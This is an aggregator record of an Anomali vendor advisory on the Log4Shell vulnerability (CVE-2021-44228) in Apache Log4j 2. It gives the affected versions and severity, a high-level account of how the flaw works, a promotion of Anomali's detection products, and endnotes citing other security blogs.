Source |
Anomali |
Identifiant |
3791723 |
Date de publication |
2021-12-13 22:26:00 (vue: 2021-12-13 23:05:46) |
Titre |
Apache Log4j 2 Vulnerability Affects Numerous Companies, Millions of Users |
Texte |
A critical vulnerability, registered as CVE-2021-44228 (Log4Shell), has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in.[1] The vulnerability was discovered by Chen Zhaojun of Alibaba in late November 2021, reported to Apache, and subsequently released to the public on December 10, 2021.[2]
The Apache Software Foundation (ASF) rates CVE-2021-44228 as a 10 on the common vulnerability scoring system (CVSS) scale.[3] Log4Shell is a remote code execution (RCE) vulnerability that is exploited via improper deserialization of user input that is sent into the Log4j package framework.[4] Specifically, the vulnerability is located in the JNDI component of the LDAP connector.[5] A threat actor’s objective is to trick JNDI into connecting to an threat actor-controlled directory.[6] However, the exploitation reliability of Log4Shell is dependent on how the package is implemented.
Affected versions: log4j version 2.0-beta9 to version 2.14.1.
Attack Complexity: Low.
Privileges Required: None.
User Interaction: Not required.
How Anomali Can Help
ThreatStream: The Anomali Threat Research team has released a ThreatStream dashboard “Log4Shell (CVE-2021-44228)” for tracking associated indicators, research articles, and vulnerable products. (shown in figure below.)
Integrator: Customers can use Anomali Integrator to block specific IOCs in their downstream security integrations.
Match: Match can provide alerting and retrospective lookup capabilities to detect and contextualize matches for these indicators.
For more information, reach out to your Customer Success Manager.
Endnotes
[1] “CVE-2021-44228 Detail,” NVD NIST, access December 13, 2021, published December 10, 2021https://nvd.nist.gov/vuln/detail/CVE-2021-44228; Free Wortley, et al., “Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package,” LunaSec, accessed December 13, 2021, published December 12, 2021, https://www.lunasec.io/docs/blog/log4j-zero-day/.
[2] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV, accessed December 13, published December 10, 2021, https://www.elastic.co/blog/detecting-log4j2-with-elastic-security.
[3] “CVE-2021-44228 Detail,” NVD NIST.
[4] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV.
[5] “Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild,” Cisco Talos Blog, accessed December 13, 2021, published December 10, 2021, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html.
[6] Hans-Martin Münch, “VULNERABILITY NOTES: LOG4SHELL,” Mogwai Labs, accessed December 13, 2021, published, December 10, 2021, https://mogwailabs.de/en/blog/2021/12/vulnerability-notes-log4shell/?s=09. |
Envoyé |
Oui |
Condensat |
how “cve “detecting “log4shell “log4shell: “threat “vulnerability 2021 2021https://nvd 44228 44228; access accessed actor actor’s advisory: affected affects alerting alibaba anomali apache articles asf associated attack been being below beta9 block blog bousseaden can capabilities chen cisco co/blog/detecting code com/2021/12/apache common companies complexity: component connecting connector contextualize controlled critical customer customers cve cvss dashboard day day/ de/en/blog/2021/12/vulnerability december dependent deserialization detail detect directory discovered downstream elastic enable endnotes execution exploit exploitation exploited figure found foundation framework free gov/vuln/detail/cve hans has help how however html https://blog https://mogwailabs https://www identified implemented improper indicators information input integrations integrator integrator: interaction: io/docs/blog/log4j iocs jake java jndi king labs late ldap located log4j log4j2 log4shell log4shell/ logging lookup low lunasec manager martin match can match: matches millions mogwai more münch nist none not notes notes: november numerous nvd objective open out package popular privileges products provide public published rates rce reach registered released reliability remote reported required required: research retrospective s=09 samir scale scoring security sent shown software source specific specifically subsequently success system talos talosintelligence team these threat threatstream threatstream: tracking trick use used user users version versions: vulnerability vulnerable which wild wortley your zero zhaojun |
Tags |
Vulnerability
Threat
|
Stories |
|
Notes |
|
Move |
|